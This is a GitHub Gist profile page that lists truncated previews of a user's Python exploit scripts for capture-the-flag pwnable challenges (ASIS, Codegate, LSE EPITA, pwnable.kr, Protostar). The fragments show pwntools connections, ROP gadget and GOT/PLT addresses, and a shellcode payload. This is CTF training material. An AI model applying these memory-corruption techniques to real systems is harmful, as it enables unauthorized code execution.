Skip to content

Instantly share code, notes, and snippets.

View 0xPwny's full-sized avatar

AJ N 0xPwny

  • Segfault the world
  • Morocco
View GitHub Profile
@0xPwny
0xPwny / asis_start.py
Created May 23, 2017 02:50
ASIS CTF Quals 2017 - Start - pwnable
#!/usr/bin/python
from pwn import *
from littlepwny import *
#con = remote(sys.argv[1],int(sys.argv[2]))
con = process("./START")
shellcode = Scode("x64")
readplt = 0x0000000000400400
@0xPwny
0xPwny / overflow1.py
Created May 19, 2017 21:10
LSE EPITA - overflow1 exploit
#!/usr/bin/python
# 72: 0804857b 128 FUNC GLOBAL DEFAULT 13 print_flag
from pwn import *
import sys
#con = process("./overflow")
con = remote(sys.argv[1],sys.argv[2])
@0xPwny
0xPwny / babypwn.py
Created May 5, 2017 18:42
BabyPwn - Codegate 2017 - exploit
#!/usr/bin/python
from pwn import *
import time
pop2ret = 0x8048b84
pop4ret = 0x8048eec
sendGOT = 0x0804b064
sendPLT = 0x08048700
@0xPwny
0xPwny / randmizi-exploit.py
Created April 12, 2017 11:50
Randmizi - MCSC 2016 CTF - PWN - 200 pts
#!/usr/bin/python
#MCSC CTF 2016: Randmizi
#Category : PWN
#Points : 200
#Exploit : Abdeljalil Nouiri
@0xPwny
0xPwny / echo1.py
Created March 13, 2017 20:44
echo1 - Pwnable.kr
#!/usr/bin/python
#author : Abdeljalil Nouiri
from pwn import *
context.arch= "amd64"
context.os = "linux"
@0xPwny
0xPwny / pwn100.py
Created March 13, 2017 10:09
LSE CTF smash stack - 100 pts
#!/usr/bin/python
#Author : Abdeljalil Nouiri
#exploit For LSE EPITA CTF : Smash Stack 100pts
from pwn import *
import sys
cmd = 0x8049dc8
#!/usr/bin/python
#Author : Abdeljalil Nouiri
#exploit For LSE EPITA CTF : Tiny Panel 50 pts
from pwn import *
import sys
username = "admin"
@0xPwny
0xPwny / mint.py
Last active March 13, 2017 20:50
Xiomara CTF - PWN 200pts
#!/usr/bin/python
from pwn import *
#Author : Abdeljalil Nouiri
# Xiorama CTF - PWN 200 Mint
"""
#LOCAL
sysoff = 0x00040310
@0xPwny
0xPwny / sandboxed.py
Created February 25, 2017 16:10
OwaspCTF 2017 - AppSec Africa - PWN 200 SandBoxed!
#!/usr/bin/python
#OWASPCTF 2017
#sandboxed exploit Code
import itertools,string,hashlib
import time,sys
from pwn import *
@0xPwny
0xPwny / stack7.py
Created February 25, 2017 16:08
Protostar - satck7
from pwn import *
jmp2heap = 0x804a008
SC = asm(shellcraft.sh())
def pwny(s,addr,shellcode):
payload = ""
payload += shellcode
payload += "\x90"*35